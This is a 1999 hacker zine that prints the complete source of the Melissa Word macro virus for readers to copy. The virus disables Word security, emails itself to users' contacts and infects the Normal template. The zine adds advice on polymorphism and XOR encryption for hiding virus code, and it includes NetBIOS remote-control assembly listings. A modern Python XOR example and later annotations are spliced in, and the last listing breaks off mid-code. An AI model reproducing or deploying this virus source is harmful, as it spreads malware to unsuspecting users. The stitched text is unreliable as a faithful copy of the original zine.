BadByte H/P/V Zine - Issue #2 - December 1999 INDEX: 0.....You are here. 1.....The Melissa e-mail/macro virus + source code. 2.....Why use polymorphism in your virus? 3.....A basic guide to EXclusive OR encryption. 4.....Simple remote administration program for a NetBios LAN. 5.....The Ph33r virus from VLAD. 6.....Join the BadSector Hacking Alliance. BadByte staph: ~~~~~~~ ~~~~~~ Th0r.........Editor..Virii....Programming..Research SKR33M.......Writer..Hacking..Programming..IRC BlazinWeed...Writer..Hacking..Programming..UNIX Shadey.......Writer..Virii....Programming.. [---------------------------------] 1. The Melissa e-mail/macro virus + source code. ~~ ~~~ ~~~~~~~ ~~~~~~~~~~~~ ~~~~~ ~ ~~~~~~ ~~~~~ Note: Turn of the WordWrap option to stop any errors when copying the source code. [Melissa source code begin] Attribute VB_Name = "Melissa" Attribute VB_Base = "1Normal.Melissa" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() On Error Resume Next If System.PrivateProfileString("","HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then CommandBars("Macro").Controls("Security...").Enabled = False System.PrivateProfileString("","HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security","Level") = 1& Else CommandBars("Tools").Controls("Macro").Enabled = False Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1) End If Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice Set UngaDasOutlook = CreateObject("Outlook.Application") Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI") If System.PrivateProfileString("","HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... 
by Kwyjibo" Then If UngaDasOutlook = "Outlook" Then DasMapiName.Logon "profile", "password" For y = 1 To DasMapiName.AddressLists.Count Set AddyBook = DasMapiName.AddressLists(y) x = 1 Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0) For oo = 1 To AddyBook.AddressEntries.Count Peep = AddyBook.AddressEntries(x) BreakUmOffASlice.Recipients.Add Peep x = x + 1 If x > 50 Then oo = AddyBook.AddressEntries.Count Next oo BreakUmOffASlice.Subject = "Important Message From " & Application.UserName BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)" BreakUmOffASlice.Attachments.Add ActiveDocument.FullName BreakUmOffASlice.Send Peep = "" Next y DasMapiName.Logoff End If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo" End If Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1) Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1) NTCL = NTI1.CodeModule.CountOfLines ADCL = ADI1.CodeModule.CountOfLines BGN = 2 If ADI1.Name <> "Melissa" Then If ADCL > 0 Then _ ADI1.CodeModule.DeleteLines 1, ADCL Set ToInfect = ADI1 ADI1.Name = "Melissa" DoAD = True End If If NTI1.Name <> "Melissa" Then If NTCL > 0 Then _ NTI1.CodeModule.DeleteLines 1, NTCL Set ToInfect = NTI1 NTI1.Name = "Melissa" DoNT = True End If If DoNT <> True And DoAD <> True Then GoTo CYA If DoNT = True Then Do While ADI1.CodeModule.Lines(1, 1) = "" ADI1.CodeModule.DeleteLines 1 Loop ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()") Do While ADI1.CodeModule.Lines(BGN, 1) <> "" ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1) BGN = BGN + 1 Loop End If If DoAD = True Then Do While NTI1.CodeModule.Lines(1, 1) = "" NTI1.CodeModule.DeleteLines 1 Loop ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()") Do While NTI1.CodeModule.Lines(BGN, 1) <> "" ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1) BGN = BGN + 1 Loop End If CYA: If NTCL <> 0 And ADCL = 0 
And (InStr(1, ActiveDocument.Name, "Document") = False) Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then ActiveDocument.Saved = True: End If 'WORD/Melissa written by Kwyjibo 'Works in both Word 2000 and Word 97 'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide! 'Word -> Email | Word 97 <--> Word 2000 ... it's a new age! If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here." End Sub [Melissa source code end.]
***** AND NOW THE ALREADY INFECTED WORD DOCUMENT (UUEncoded & Zipped) *****
[---------------------------------]

2. Why use polymorphism in your virus?
~~ ~~~ ~~~ ~~~~~~~~~~~~ ~~ ~~~~ ~~~~~~

Basically, a polymorphic virus "mutates" by changing the encryption value like a normal encrypting virus, but it also changes the decryptor by inserting junk instructions or rearranging the decryptor instructions.

There are at least 7 polymorphic routines that I can think of:

1. Many encryption methods - uses multiple, constant encryptors.
2. Difference methods - uses different registers and/or opcodes each time or swaps the decryptor instructions around.
3. Junk instructions - inserts instructions like "mov ax,ax" which effectively do nothing.
4. One that implements 1 & 2
5. One that implements 1 & 3
6. One that implements 2 & 3
7. One that implements 1, 2 & 3

Some junk instructions:

OR AL, AL
MOV AX, AX
SWP DX, AX (followed by the same)
INC BX (followed by DEC BX)

[---------------------------------]

3. A basic guide to exclusive OR encryption.
~~ ~ ~~~~~ ~~~~~ ~~ ~~~~~~~~~ ~~ ~~~~~~~~~~~

Exclusive OR (EOR, EXOR or XOR) takes two input bits: if both bits are the same (both 0 or both 1) it returns 0, and if one input is 1 and the other is 0 it returns 1. For example, if we take Input A as the bit to encrypt and Input B as the key bit:

 Bit | Key | Output
-----+-----+-------
  0  XOR  0  =  0
  0  XOR  1  =  1
  1  XOR  0  =  1
  1  XOR  1  =  0

Now, if we swap Output with the bit that has been encrypted, we get:

 Output | Key | Bit
--------+-----+----
   0    XOR  0  =  0
   1    XOR  1  =  0
   1    XOR  0  =  1
   0    XOR  1  =  1

Now how hard was that? This encryption method could be used to encrypt data or your virii code to stop it being disassembled, debugged or found, although it is a very crude encryption method as there are only 255 keys available to encrypt the data/virus. For better, stronger encryption, I would suggest adding multiple XOR loops and/or incrementing/decrementing instructions.

[---------------------------------]
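To make the truth tables concrete, here is an added Python example (not code from the zine) that applies the table to whole bytes, shows that XORing twice with the same key restores the input, and adds two points a defender should know: two constant XOR loops collapse into a single XOR, and a one-byte key is recovered instantly by trying every value. The sample sentence and the key 0x5A are constructed.

```python
from __future__ import annotations

# Added example for the XOR section above, not code from the zine.
# The sample text and the key 0x5A below are constructed for illustration.


def xor_bytes(data: bytes, key: int) -> bytes:
    """Apply the section's bit truth table to every bit of every byte."""
    if not 0 <= key <= 0xFF:
        raise ValueError("single-byte key must be in 0..255")
    return bytes(b ^ key for b in data)


def truth_table() -> list[tuple[int, int, int]]:
    """The four (bit, key, output) rows from the section, computed."""
    return [(bit, key, bit ^ key) for bit in (0, 1) for key in (0, 1)]


def stacked_xor_collapses(data: bytes, key1: int, key2: int) -> bool:
    """Two XOR loops with constant keys equal one XOR with key1 ^ key2,
    so adding loops does not enlarge the effective key space."""
    two_passes = xor_bytes(xor_bytes(data, key1), key2)
    return two_passes == xor_bytes(data, key1 ^ key2)


def english_score(buf: bytes) -> int:
    """Crude plaintext likelihood: reward spaces and lowercase letters,
    penalise bytes that are not printable ASCII."""
    score = 0
    for b in buf:
        if b == 0x20:
            score += 2
        elif 0x61 <= b <= 0x7A:
            score += 1
        elif not (0x20 <= b < 0x7F or b in (0x09, 0x0A, 0x0D)):
            score -= 10
    return score


def recover_single_byte_key(ciphertext: bytes) -> int:
    """Try every possible key and keep the most text-like result.
    A one-byte key space makes this exhaustive search instant, which is
    why analysts routinely unpack XOR-'protected' strings this way."""
    return max(range(256), key=lambda k: english_score(xor_bytes(ciphertext, k)))


if __name__ == "__main__":
    for bit, key, out in truth_table():
        print(f"{bit} XOR {key} = {out}")
    sample = b"the key space of a single byte xor is far too small to hide anything"
    ct = xor_bytes(sample, 0x5A)
    print("round trip ok:", xor_bytes(ct, 0x5A) == sample)
    print("two loops == one loop:", stacked_xor_collapses(sample, 0x5A, 0x3C))
    print("recovered key: 0x%02X" % recover_single_byte_key(ct))
```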
4. Simple remote administration program for a NetBios LAN.
~~ ~~~~~~ ~~~~~~ ~~~~~~~~~~~~~~ ~~~~~~~ ~~~ ~ ~~~~~~~ ~~~~

I couldn't be bothered writing much so here's what the documentation says:

Workstation Remote Control Software for your NETBIOS LAN

SLAVE and MASTER are a pair of programs you can use when you want to remotely control another workstation on your LAN. First, run SLAVE on the workstation you want to control. From a different workstation, run MASTER to take control of the SLAVE'd workstation. SLAVE stays in memory, ready for each session with MASTER, until you reboot that workstation. To end a MASTER/SLAVE session, press the following keys at the MASTER workstation: CTRL and the '5' key on the numeric keypad.

Limitations: screen and keyboard activity are mirrored, but printer and mouse activity are not. Graphics modes are not supported; the programs work only in text mode. Also, there is no arbitration of screen attributes between monochrome and color screens -- the same attributes displayed on the SLAVE computer are displayed on the MASTER computer.

[BEGIN MASTER.ASM]
;---------------------------------------------------- ; ; MASTER -- remotely control a PC across ; a Netbios LAN.
(see SLAVE.ASM) ; ; Test version 0.9 ; ; (c) 1990 Barry Nance ; ;---------------------------------------------------- DOSSEG .MODEL small StdIn = 0000 StdOut = 0001 StdErr = 0002 RESET = 032h CANCEL = 035h STATUS = 0b3h STATUS_WAIT = 033h TRACE = 0f9h TRACE_WAIT = 079h UNLINK = 070h ADD_NAME = 0b0h ADD_NAME_WAIT = 030h ADD_GROUP_NAME = 0b6h ADD_GROUP_NAME_WAIT = 036h DELETE_NAME = 0b1h DELETE_NAME_WAIT = 031h CALL_CMD = 090h CALL_WAIT = 010h LISTEN = 091h LISTEN_WAIT = 011h HANG_UP = 092h HANG_UP_WAIT = 012h SEND = 094h SEND_WAIT = 014h SEND_NO_ACK = 0f1h SEND_NO_ACK_WAIT = 071h CHAIN_SEND = 097h CHAIN_SEND_WAIT = 017h CHAIN_SEND_NO_ACK = 0f2h CHAIN_SEND_NO_ACK_WAIT = 072h RECEIVE = 095h RECEIVE_WAIT = 015h RECEIVE_ANY = 096h RECEIVE_ANY_WAIT = 016h SESSION_STATUS = 0b4h SESSION_STATUS_WAIT = 034h SEND_DATAGRAM = 0a0h SEND_DATAGRAM_WAIT = 020h SEND_BCST_DATAGRAM = 0a2h SEND_BCST_DATAGRAM_WAIT = 022h RECEIVE_DATAGRAM = 0a1h RECEIVE_DATAGRAM_WAIT = 021h RECEIVE_BCST_DATAGRAM = 0a3h RECEIVE_BCST_DATAGRAM_WAIT = 023h NCB struc COMMAND db ? RETCODE db ? LSN db ? NUM db ? BUFFER_PTR dd ? LEN dw ? CALLNAME db 16 dup (?) OURNAME db 16 dup (?) RTO db ? STO db ? POST_FUNC dd ? LANA_NUM db ? CMD_CPLT db ? RESERVE db 14 dup (?) NCB EndS .DATA Msg2 DB "Looking for SLAVE -- Press ESC to quit." DB 13, 10 Msg2Len = $-Msg2 Msg3 DB "Early versions of DOS not supported." DB 13, 10 Msg3Len = $-Msg3 Msg4 DB "ERROR--NETBIOS not active." DB 13, 10 Msg4Len = $-Msg4 Msg5 DB "Adding name to network..." DB 13, 10 Msg5Len = $-Msg5 Msg6 DB "ERROR -- SLAVE not found." DB 13, 10 Msg6Len = $-Msg6 Msg8 DB 13, 10, 13, 10 DB "MASTER finished." 
DB 13, 10 Msg8Len = $-Msg8 dos_major DB 0 dos_minor DB 0 EGAFlagPtr Label DWord EGAFlagOfs DW 0487h EGAFlagSeg DW 0 VideoPtr Label DWord VideoOfs DW 0 VideoSeg DW 0 Done DB 1 OurNameNumber DB 0 LocSave DW 0 ShapeSave DW 0 slave_name DB "Slave " DB 0 master_name DB "Master " DB 0 send_ncb NCB <> recv_ncb NCB <> add_name_ncb NCB <> delete_name_ncb NCB <> cncl_ncb NCB <> Screen_Data Label Byte ScreenPos DW 0 CursorShape DW 0 CursorLoc DW 0 Head2 DW 0 ScreenPkt DB 500 Dup(0) Kbd_Data Label Byte KbdFlag1 DB 0 KbdFlag2 DB 0 AltInput DB 0 Sess_Flag DW 0 Tail DW 0 KbdBuffer DW 16 Dup(0) .STACK 200h .CODE scan_code DB 0 In_Int10 DB 0 oldint09 Label DWord oldint09_ofs DW 0 oldint09_seg DW 0 oldint10 Label DWord oldint10_ofs DW 0 oldint10_seg DW 0 SS_Save1 DW 0 SP_Save1 DW 0 StackSeg1 DW 0 StackOfs1 DW 0 DW 256 Dup(0) OurStack1 DW 0 SS_Save2 DW 0 SP_Save2 DW 0 StackSeg2 DW 0 StackOfs2 DW 0 DW 256 Dup(0) OurStack2 DW 0 ;--------------------------------------- Assume CS:_TEXT, DS:_DATA, ES:Nothing Add_Our_Name Proc Near mov add_name_ncb.COMMAND, ADD_NAME push ds pop es mov si, offset master_name mov di, offset add_name_ncb.OURNAME mov cx, 8 rep movsw mov word ptr add_name_ncb.POST_FUNC+2, 0 mov word ptr add_name_ncb.POST_FUNC, 0 mov add_name_ncb.CMD_CPLT, 0FFh mov bx, offset add_name_ncb Int 5Ch wait_add: cmp add_name_ncb.CMD_CPLT, 0FFh je wait_add ret Add_Our_Name EndP Delete_Our_Name Proc Near push ds pop es mov delete_name_ncb.COMMAND, DELETE_NAME mov si, offset master_name mov di, offset delete_name_ncb.OURNAME mov cx, 8 rep movsw mov word ptr delete_name_ncb.POST_FUNC+2, 0 mov word ptr delete_name_ncb.POST_FUNC, 0 mov delete_name_ncb.CMD_CPLT, 0FFh mov bx, offset delete_name_ncb Int 5Ch wait_delete: cmp delete_name_ncb.CMD_CPLT, 0FFh je wait_delete ret Delete_Our_Name EndP Cancel_Recv Proc Near push ds pop es mov cncl_ncb.COMMAND, CANCEL mov ax, offset recv_ncb mov word ptr cncl_ncb.BUFFER_PTR, ax mov word ptr cncl_ncb.BUFFER_PTR+2, ds mov bx, offset cncl_ncb int 5Ch ret 
Cancel_Recv EndP ; ; enter Receive with: ; DX:AX - address of buffer ; CX - number of bytes to receive ; BP:BX - address of POST routine ; Recv_Msg Proc Near push ds pop es mov recv_ncb.COMMAND, RECEIVE_DATAGRAM push ax mov al, OurNameNumber mov recv_ncb.NUM, al pop ax mov recv_ncb.LEN, CX mov word ptr recv_ncb.BUFFER_PTR+2, dx mov word ptr recv_ncb.BUFFER_PTR, ax mov word ptr recv_ncb.POST_FUNC+2, bp mov word ptr recv_ncb.POST_FUNC, bx mov recv_ncb.CMD_CPLT, 0FFh mov bx, offset recv_ncb Int 5Ch ret Recv_Msg EndP ;--------------------------------------- ; ; enter Send with: ; DX:AX - address of buffer ; CX - number of bytes to send ; BP:BX - address of POST routine ; DS:SI - address of destination name ; Send_Msg Proc Near push ds pop es mov send_ncb.COMMAND, SEND_DATAGRAM lea di, send_ncb.CALLNAME push cx mov cx, 8 rep movsw pop cx push ax mov al, OurNameNumber mov send_ncb.NUM, al pop ax mov send_ncb.LEN, cx mov word ptr send_ncb.BUFFER_PTR+2, dx mov word ptr send_ncb.BUFFER_PTR, ax mov word ptr send_ncb.POST_FUNC+2, bp mov word ptr send_ncb.POST_FUNC, bx mov send_ncb.CMD_CPLT, 0FFh mov bx, offset send_ncb Int 5Ch ret Send_Msg EndP ;--------------------------------------- Assume CS:_TEXT, DS:Nothing, ES:Nothing Int_09: sti push ax I9_get_scan: in al, 60h mov cs:scan_code, al pop ax I9_chain_old: pushf cli call cs:oldint09 cli mov cs:SS_Save1, ss mov cs:SP_Save1, sp mov ss, cs:StackSeg1 mov sp, cs:StackOfs1 sti I9_save_regs: push ax push bx push cx push dx push si push di push bp push ds push es Assume CS:_TEXT, DS:_DATA, ES:Nothing mov ax, @DATA mov ds, ax cld ChkCtrl5: mov ax, 0040h mov es, ax test byte ptr es:[0017h], 04h ; Ctrl jz NotCtrl5 cmp cs:scan_code, 4Ch ; Center 5 je SayToQuit NotCtrl5: jmp I9_SendKbd SayToQuit: mov Done, 1 I9_ChkLastSend: cmp send_ncb.CMD_CPLT, 0FFh je I9_ChkLastSend mov Sess_Flag, -1 mov dx, ds mov ax, offset Kbd_Data mov cx, 39 mov bp, 0 mov bx, 0 mov si, offset slave_name call Send_Msg GotoExit: jmp Int09Exit I9_SendKbd: cmp Done, 
0 je Chk_Changed jmp Int09Exit Chk_Changed: mov ax, 0040h mov es, ax mov al, es:[0017h] cmp al, KbdFlag1 jne I9_Send_It mov al, es:[0018h] cmp al, KbdFlag2 jne I9_Send_It mov ax, es:[001Ch] cmp ax, Tail jne I9_Send_It jmp short Int09Exit I9_Send_It: cmp send_ncb.CMD_CPLT, 0FFh je GotoExit I9_SaveKbd: push ds pop es mov ax, 0040h mov ds, ax mov si, 0017h mov di, offset Kbd_Data mov cx, 39 rep movsb push es pop ds mov Sess_Flag, 0 mov dx, ds mov ax, offset Kbd_Data mov cx, 39 mov bp, 0 mov bx, 0 mov si, offset slave_name call Send_Msg Int09Exit: Assume CS:_TEXT, DS:Nothing pop es pop ds pop bp pop di pop si pop dx pop cx pop bx pop ax I9_Sw_Stack2: cli mov ss, cs:SS_Save1 mov sp, cs:SP_Save1 iret ;--------------------------------------- Int_10: mov cs:In_Int10, 1 pushf call cs:OldInt10 mov cs:In_Int10, 0 iret ;--------------------------------------- ScreenRecv: mov cs:SS_Save2, ss mov cs:SP_Save2, sp mov ss, cs:StackSeg2 mov sp, cs:StackOfs2 sti cld push ax push bx push cx push dx push si push di push bp push ds push es Assume CS:_TEXT, DS:_DATA, ES:Nothing mov ax, @DATA mov ds, ax cmp Done, 0 je Chk_RetCode jmp ScreenRecvExit Chk_RetCode: cmp recv_ncb.CMD_CPLT, 0 je EchoScreen jmp RecvScreen2 EchoScreen: les di, VideoPtr add di, ScreenPos mov si, offset ScreenPkt mov cx, 250 rep movsw CheckIn10: cmp cs:In_Int10, 1 je Set_Head CheckShape: mov cx, CursorShape cmp cx, ShapeSave je CheckLocation mov ShapeSave, cx mov ah, 1 int 10h CheckLocation: mov dx, CursorLoc cmp dx, LocSave je Set_Head mov LocSave, dx mov bh, 0 mov ah, 2 int 10h Set_Head: mov ax, 0040h mov es, ax cli mov ax, Head2 mov word ptr es:[001Ah], ax sti RecvScreen2: mov dx, ds mov ax, offset Screen_Data mov cx, 508 mov bp, cs mov bx, offset ScreenRecv call Recv_Msg ScreenRecvExit: Assume CS:_TEXT, DS:Nothing pop es pop ds pop bp pop di pop si pop dx pop cx pop bx pop ax cli mov ss, cs:SS_Save2 mov sp, cs:SP_Save2 iret ;--------------------------------------- Start: Assume CS:_TEXT, DS:_DATA, ES:Nothing mov 
ax, @DATA mov ds, ax mov ax, cs mov cs:StackSeg1, ax mov ax, offset OurStack1 mov cs:StackOfs1, ax mov ax, cs mov cs:StackSeg2, ax mov ax, offset OurStack2 mov cs:StackOfs2, ax get_dos_vers: mov ax, 3000h int 21h mov dos_major, al mov dos_minor, ah cmp al, 2 ja netbios_test1 wrong_dos: mov bx, 2 mov dx, offset Msg3 mov cx, Msg3Len mov ah, 40h int 21h mov ax, 4C00h int 21h netbios_test1: mov ax, 0 mov es, ax cmp word ptr es:[0170h], 0 jne netbios_test2 no_netbios: mov bx, 2 mov dx, offset Msg4 mov cx, Msg4Len mov ah, 40h int 21h mov ax, 4C00h int 21h netbios_test2: mov send_ncb.COMMAND, 7Fh mov send_ncb.RETCODE, 0 mov send_ncb.CMD_CPLT, 0FFh mov ax, ds mov es, ax mov bx, offset send_ncb Int 5Ch cmp send_ncb.RETCODE, 3 jne no_netbios bw_or_color: mov ah, 0Fh int 10h Cmp AL, 7 JE SetMono Jmp LookFurther SetMono: Mov VideoSeg, 0B000h Mov VideoOfs, 0000 Jmp network_name LookFurther: Mov bx, 0FF10h Mov ah, 12h Int 10h Test bh, 0FEh JZ EGAPresent Jmp SetCGA EGAPresent: LES BX, EGAFlagPtr Mov AL, Byte Ptr ES:[BX] Test AL, 00000101b JNZ SetCGA Test AL, 00000100b JNZ SetMono Test AL, 00000001b JNZ SetMono EGAIsActive: Mov VideoSeg, 0B800h Mov VideoOfs, 0000 Jmp network_name SetCGA: Mov VideoSeg, 0B800h Mov VideoOfs, 0000 network_name: mov bx, 2 mov dx, offset Msg5 mov cx, Msg5Len mov ah, 40h int 21h call Add_Our_Name mov al, add_name_ncb.NUM mov OurNameNumber, al cmp add_name_ncb.CMD_CPLT, 0 je say_hello jmp prog_exit say_hello: mov bx, 2 mov dx, offset Msg2 mov cx, Msg2Len mov ah, 40h int 21h Ping_Slave: mov Sess_Flag, 1 mov dx, ds mov ax, offset Kbd_Data mov cx, 39 mov bp, 0 mov bx, 0 mov si, offset slave_name call Send_Msg mov dx, ds mov ax, offset Screen_Data mov cx, 8 mov bp, 0 mov bx, 0 call Recv_Msg Wait_Ping: cmp recv_ncb.CMD_CPLT, 0FFh jne Pinged_Back mov ah, 1 int 16h jz Wait_Ping mov ah, 0 int 16h cmp al, 27 jne Wait_Ping Ping_Error: mov bx, 2 mov dx, offset Msg6 mov cx, Msg6Len mov ah, 40h int 21h call Delete_Our_Name jmp prog_exit Pinged_Back: cmp 
recv_ncb.CMD_CPLT, 0 jne Ping_Error ChkPing: cmp ScreenPos, -1 jne Ping_Error ResetKBD: mov ax, 0040h mov es, ax cli mov byte ptr es:[0017h], 0 mov byte ptr es:[0018h], 0 mov ax, word ptr es:[0080h] mov word ptr es:[001Ah], ax mov word ptr es:[001Ch], ax sti mov ax, ds mov es, ax save_int9: mov ax, 3509h int 21h mov cs:oldint09_seg, ES mov cs:oldint09_ofs, BX save_int10: mov ax, 3510h int 21h mov cs:oldint10_seg, ES mov cs:oldint10_ofs, BX install_int9: push ds mov dx, offset Int_09 push cs pop ds mov ax, 2509h int 21h pop ds install_int10: push ds mov dx, offset Int_10 push cs pop ds mov ax, 2510h int 21h pop ds RecvScreen: mov dx, ds mov ax, offset Screen_Data mov cx, 508 mov bp, cs mov bx, offset ScreenRecv call Recv_Msg mov Done, 0 while_not_done: cmp Done, 0 je while_not_done deinstall_int9: push ds mov dx, cs:oldint09_ofs mov ds, cs:oldint09_seg mov ax, 2509h int 21h pop ds deinstall_10: push ds mov dx, cs:oldint10_ofs mov ds, cs:oldint10_seg mov ax, 2510h int 21h pop ds ResetKBD2: mov ax, 0040h mov es, ax cli mov byte ptr es:[0017h], 0 mov byte ptr es:[0018h], 0 mov ax, word ptr es:[0080h] mov word ptr es:[001Ah], ax mov word ptr es:[001Ch], ax sti mov ax, ds mov es, ax CnclRecv: call Cancel_Recv remove_name: call Delete_Our_Name prog_exit: mov bx, 2 mov dx, offset Msg8 mov cx, Msg8Len mov ah, 40h int 21h mov ax, 4C00h int 21h End Start [END MASTER.ASM] Now for the slave. [BEGIN SLAVE.ASM] ;---------------------------------------------------- ; ; SLAVE -- allow another PC (on a Netbios LAN) ; to control this one. 
(see MASTER.ASM)
;
; Test version 0.9
;
; (c) 1990 Barry Nance
;
;----------------------------------------------------

        DOSSEG
        .MODEL small

StdIn   = 0000
StdOut  = 0001
StdErr  = 0002

; NetBIOS command codes. Bit 7 set = "no-wait" (asynchronous, completion
; signalled through the NCB POST routine); the _WAIT form blocks instead.
RESET                      = 032h
CANCEL                     = 035h
STATUS                     = 0b3h
STATUS_WAIT                = 033h
TRACE                      = 0f9h
TRACE_WAIT                 = 079h
UNLINK                     = 070h
ADD_NAME                   = 0b0h
ADD_NAME_WAIT              = 030h
ADD_GROUP_NAME             = 0b6h
ADD_GROUP_NAME_WAIT        = 036h
DELETE_NAME                = 0b1h
DELETE_NAME_WAIT           = 031h
CALL_CMD                   = 090h
CALL_WAIT                  = 010h
LISTEN                     = 091h
LISTEN_WAIT                = 011h
HANG_UP                    = 092h
HANG_UP_WAIT               = 012h
SEND                       = 094h
SEND_WAIT                  = 014h
SEND_NO_ACK                = 0f1h
SEND_NO_ACK_WAIT           = 071h
CHAIN_SEND                 = 097h
CHAIN_SEND_WAIT            = 017h
CHAIN_SEND_NO_ACK          = 0f2h
CHAIN_SEND_NO_ACK_WAIT     = 072h
RECEIVE                    = 095h
RECEIVE_WAIT               = 015h
RECEIVE_ANY                = 096h
RECEIVE_ANY_WAIT           = 016h
SESSION_STATUS             = 0b4h
SESSION_STATUS_WAIT        = 034h
SEND_DATAGRAM              = 0a0h
SEND_DATAGRAM_WAIT         = 020h
SEND_BCST_DATAGRAM         = 0a2h
SEND_BCST_DATAGRAM_WAIT    = 022h
RECEIVE_DATAGRAM           = 0a1h
RECEIVE_DATAGRAM_WAIT      = 021h
RECEIVE_BCST_DATAGRAM      = 0a3h
RECEIVE_BCST_DATAGRAM_WAIT = 023h

; Network Control Block: the 64-byte structure handed to NetBIOS via Int 5Ch.
NCB         struc
COMMAND     db ?
RETCODE     db ?
LSN         db ?
NUM         db ?
BUFFER_PTR  dd ?
LEN         dw ?
CALLNAME    db 16 dup (?)
OURNAME     db 16 dup (?)
RTO         db ?
STO         db ?
POST_FUNC   dd ?
LANA_NUM    db ?
CMD_CPLT    db ?
RESERVE     db 14 dup (?)
NCB         EndS

        .DATA

EGAFlagPtr  Label DWord
EGAFlagOfs  DW 0487h
EGAFlagSeg  DW 0

Msg1    DB "SLAVE is now waiting for MASTER to make contact."
        DB 13, 10
Msg1Len = $-Msg1
Msg2    DB "Early versions of DOS not supported."
        DB 13, 10
Msg2Len = $-Msg2
Msg3    DB "Error--NETBIOS not active."
        DB 13, 10
Msg3Len = $-Msg3
Msg4    DB "Adding name to network..."
        DB 13, 10
Msg4Len = $-Msg4

        .STACK 200h

        .CODE
;---------------------------------------
our_psp         DW 0
our_mcb_seg     DW 0
next_mcb_seg    DW 0
dos_major       DB 0
dos_minor       DB 0
SessionActive   DB 0
OurNameNumber   DB 0
InInt8          DB 0
slave_name      DB "Slave          "    ; 15 chars, space padded (padding lost in
                DB 0                    ; the zine copy); NetBIOS names are 16 bytes
master_name     DB "Master         "
                DB 0
send_ncb        NCB <>
recv_ncb        NCB <>
add_name_ncb    NCB <>
delete_name_ncb NCB <>
oldint08        Label DWord
oldint08_ofs    DW 0
oldint08_seg    DW 0
VideoPtr        Label DWord
VideoOfs        DW 0
VideoSeg        DW 0
ScreenSave      DB 4000 Dup(0)          ; last copy of the 80x25 text screen
Screen_Data     Label Byte              ; datagram sent to MASTER (8 or 508 bytes)
ScreenPos       DW 0
CursorShape     DW 0
CursorLoc       DW 0
Head2           DW 0
ScreenPkt       DB 500 Dup(0)
Kbd_Data        Label Byte              ; datagram received from MASTER (39 bytes)
KbdFlag1        DB 0
KbdFlag2        DB 0
AltInput        DB 0
Sess_Flag       DW 0
Tail            DW 0
KbdBuffer       DW 16 Dup(0)
QuadrantCounter DW 0
Quadrant        DW 8
Quadrant_Ofs    DW 0
SS_Save1        DW 0
SP_Save1        DW 0
StackSeg1       DW 0
StackOfs1       DW 0
                DW 256 Dup(0)
OurStack1       DW 0
SS_Save2        DW 0
SP_Save2        DW 0
StackSeg2       DW 0
StackOfs2       DW 0
                DW 256 Dup(0)
OurStack2       DW 0
;---------------------------------------
        Assume CS:_TEXT, DS:_TEXT, ES:Nothing

Add_Our_Name Proc Near
        push    ds
        push    cs
        pop     ds
        push    cs
        pop     es
        mov     add_name_ncb.COMMAND, ADD_NAME
        mov     si, offset slave_name
        mov     di, offset add_name_ncb.OURNAME
        mov     cx, 8
        rep     movsw
        mov     word ptr add_name_ncb.POST_FUNC+2, 0
        mov     word ptr add_name_ncb.POST_FUNC, 0
        mov     add_name_ncb.CMD_CPLT, 0FFh
        mov     bx, offset add_name_ncb
        Int     5Ch
wait_add:
        cmp     add_name_ncb.CMD_CPLT, 0FFh
        je      wait_add
        pop     ds
        ret
Add_Our_Name EndP

;
; enter Send with:
;     DX:AX - address of buffer
;     CX    - number of bytes to send
;     BP:BX - address of POST routine
;     DS:SI - address of destination name
;
Send_Msg Proc Near
        push    ds
        push    cs
        pop     ds
        push    cs
        pop     es
        mov     send_ncb.COMMAND, SEND_DATAGRAM
        lea     di, send_ncb.CALLNAME
        push    ax
        push    cx
        mov     cx, 8
        rep     movsw
        mov     al, OurNameNumber
        mov     send_ncb.NUM, al
        pop     cx
        pop     ax
        mov     send_ncb.LEN, cx
        mov     word ptr send_ncb.BUFFER_PTR+2, dx
        mov     word ptr send_ncb.BUFFER_PTR, ax
        mov     word ptr send_ncb.POST_FUNC+2, bp
        mov     word ptr send_ncb.POST_FUNC, bx
        mov     send_ncb.CMD_CPLT, 0FFh
        mov     bx, offset send_ncb
        int     5Ch
        pop     ds
        ret
Send_Msg EndP

Recv_Msg Proc Near
        push    ds
        push    cs
        pop     ds
        push    cs
        pop     es
        push    ax
        mov     recv_ncb.COMMAND, RECEIVE_DATAGRAM
        mov     al, OurNameNumber
        mov     recv_ncb.NUM, al
        mov     recv_ncb.LEN, cx
        pop     ax
        mov     word ptr recv_ncb.BUFFER_PTR+2, dx
        mov     word ptr recv_ncb.BUFFER_PTR, ax
        mov     word ptr recv_ncb.POST_FUNC+2, bp
        mov     word ptr recv_ncb.POST_FUNC, bx
        mov     recv_ncb.CMD_CPLT, 0FFh
        mov     bx, offset recv_ncb
        Int     5Ch
        pop     ds
        ret
Recv_Msg EndP

        Assume CS:_TEXT, DS:Nothing, ES:Nothing

; Timer tick (IRQ0) hook: while a session is active, compares one 500-byte
; screen quadrant per tick against ScreenSave and sends it to MASTER if changed.
Int_08:
        pushf
        call    cs:oldint08
I8_Sw_Stack1:
        mov     cs:SS_Save1, ss
        mov     cs:SP_Save1, sp
        mov     ss, cs:StackSeg1
        mov     sp, cs:StackOfs1
        sti
        cld
I8_save_regs:
        push    ax
        push    bx
        push    cx
        push    dx
        push    si
        push    di
        push    bp
        push    ds
        push    es
